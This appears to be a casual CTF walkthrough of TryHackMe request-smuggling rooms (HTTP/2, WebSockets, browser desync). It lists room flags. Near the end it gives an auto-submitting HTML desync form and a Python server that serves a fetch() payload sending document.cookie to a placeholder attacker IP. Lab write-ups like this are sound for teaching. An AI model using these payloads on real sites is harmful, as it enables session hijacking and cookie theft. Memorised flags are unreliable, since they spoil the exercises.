It’s Wednesday my dudes and we on carrying on with the HTTP/2 Request Smuggling room on THM!
Flag – THM{nom_nom_cookies}
Doesn’t work & THM are the ones that direct you to this git repo..
Now we move on to the Request Smuggling: WebSockets room on THM!
Flag – THM{bf208caddc31c6bb52621fdc2b3a73e5}
This I could not understand, It was replying and reaching my python server as stated in the question and room but It would not process via burp even though it was a copy and paste job… This is soo fucking stupid?
Flag – THM{a87d4e5b777c010ed3266e59fb42ccac}
Next we move on to the HTTP Browser Desync room on THM.
Flag – THM{SMUGGLING_IS_FUN}
<form id="btn" action="http://challenge.thm/"
method="POST"
enctype="text/plain">
<textarea name="GET http://YOUR_IP:1337 HTTP/1.1
AAA: A">placeholder1</textarea>
<button type="submit">placeholder2</button>
</form>
<script> btn.submit() </script>Finally, we will serve a payload on our controlled server to steal the user’s cookie and send it to us.
#!/usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
class ExploitHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/':
self.send_response(200)
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Content-type","text/html")
self.end_headers()
self.wfile.write(b"fetch('http://YOUR_IP:8080/' + document.cookie)")
def run_server(port=1337):
server_address = ('', port)
httpd = HTTPServer(server_address, ExploitHandler)
print(f"Server running on port {port}")
httpd.serve_forever()
if __name__ == '__main__':
run_server()Until next time & don’t sleepwalk through life!
Jan mayampitaki